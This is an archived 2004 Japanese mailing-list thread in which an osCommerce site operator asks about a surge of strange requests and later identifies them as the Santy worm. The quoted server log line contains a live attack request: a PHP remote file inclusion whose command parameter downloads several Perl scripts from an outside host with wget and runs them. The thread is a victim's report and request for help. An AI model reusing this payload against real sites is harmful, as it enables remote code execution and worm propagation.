[Tep-j-general] Re: spy.gif ってなんでしょうか?

Zurück zum Archiv-Index

kushima michio michiok_mac****@mac*****
2004年 12月 27日 (月) 10:20:37 JST


すみません。
これ、いま話題の、santy worm でしたね。
感染はしていないようだけど、この汚くなったログを、
どうすればいいんだろうか...。

 
On 2004.12.26, at 12:33, kushima michio <michiok_mac****@mac*****> wrote:

>
>michio です。
>
>昨日から、異常にアクセスが増えて、調べてみたところ、
>以下のように、OSCで利用するPHPへのアクセスに対して、
>何か不正を働こうとしているようです。
>
>
>67.19.230.106 - - [26/Dec/2004:04:02:06 +0900] "GET /information.php?tpl=http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget www.visualcoders.net/spybot.txt;wget www.visualcoders.net/worm1.txt;wget www.visualcoders.net/php.txt;wget www.visualcoders.net/ownz.txt;wget www.visualcoders.net/zone.txt;perl spybot.txt;perl worm1.txt;perl ownz.txt;perl php.txt HTTP/1.1" 200 31573 "-" "LWP::Simple/5.800"
>
>
>何か、聞くところを間違えてる気もしますが、今まで、経験が無く、
>放置していいものか悩みまして、書き込みしてみました。
>
>PHPのバージョンによっては、まずいとかそういう話なんだとは思いますが、
>検索では引っかかってこなかったので、もし何か情報あれば、お教えいただけないかとおもい、
>書き込んでみました。
>
>--------------
>michio
>
>
>_______________________________________________
>Tep-j-general mailing list
>Tep-j****@lists*****
>http://lists.sourceforge.jp/mailman/listinfo/tep-j-general
>
>



Tep-j-general メーリングリストの案内
Zurück zum Archiv-Index